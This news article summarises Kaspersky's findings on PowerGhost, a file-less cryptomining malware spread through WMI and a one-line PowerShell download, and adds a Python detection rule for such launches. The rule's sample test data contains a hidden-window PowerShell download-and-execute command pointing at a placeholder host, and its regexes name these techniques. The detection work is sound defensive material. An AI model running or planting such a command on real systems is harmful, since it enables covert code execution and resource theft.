Researchers at Kaspersky Lab have detected a new piece of malware. According to their report, it is spreading very rapidly on corporate networks in India, Brazil, Colombia, and Turkey. Named PowerGhost, it is file-less malware that can stealthily get inside a system on a network and then spread to other PCs and the organization's servers.
The malware uses the resources and computing power of infected systems to mine cryptocurrency. The attackers initiate infections through remote administration tools or plain exploits, and because the malware is file-less, it is not easily detected on the network, which makes it even harder to deal with.
Geography of infections by the miner | Image Source: Kaspersky Lab
“The malicious program uses lots of file-less techniques to remain inconspicuous to the user and undetected by antivirus technologies. The victim machine is infected remotely using exploits or remote administration tools (Windows Management Instrumentation). During infection, a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive,” stated securelist.
The complete technical description and a more detailed report can be read at the official blog.
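The quoted description (remote launch through WMI, then a one-line PowerShell command that downloads and runs code without touching disk) maps onto process-creation telemetry. The following is an added example, not taken from the Kaspersky report or this article: the event field names and the sample events are constructed, and the token lists are generic PowerShell download-and-execute indicators, not PowerGhost-specific signatures.

```python
import re

# Assumed, normalized process-creation events (e.g. derived from Sysmon Event ID 1).
# Field names are hypothetical; all sample events below are constructed.
WMI_PARENT = "wmiprvse.exe"            # parent of processes created through WMI
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Command-line tokens that fetch content over the network.
DOWNLOAD = re.compile(r"downloadstring|downloaddata|net\.webclient|invoke-webrequest|\biwr\b", re.I)
# Tokens that run a string or encoded blob directly in memory (-e/-enc/-EncodedCommand).
IN_MEMORY = re.compile(r"invoke-expression|\biex\b|\s-e[ncodema]*\s", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return the indicators a PowerShell launch matches (empty for other processes)."""
    if basename(ev["image"]) not in POWERSHELL:
        return []
    reasons = []
    if basename(ev["parent_image"]) == WMI_PARENT:
        reasons.append("spawned-by-wmi")
    if DOWNLOAD.search(ev["command_line"]):
        reasons.append("network-download")
    if IN_MEMORY.search(ev["command_line"]):
        reasons.append("in-memory-exec")
    return reasons

def alerts(events, threshold=2):
    """Flag launches matching at least `threshold` indicators; one alone is often benign."""
    out = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= threshold:
            out.append((ev["host"], reasons))
    return out

SAMPLE_EVENTS = [  # constructed test data
    {"host": "ws-014", "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"},
    {"host": "ws-022", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"host": "srv-03", "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -Command Get-Service"},
]

if __name__ == "__main__":
    for host, reasons in alerts(SAMPLE_EVENTS):
        print(host, ", ".join(reasons))
```

Because nothing is written to disk, the command line and parent process are the main artifacts available, so this kind of rule depends on process-creation logging with full command lines being enabled.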
This is a golden chance for hackers to affect the crypto-world and make big bucks. The malware is surely a severe problem: firms whose servers are at risk must look into it and deal with it before lasting damage is done.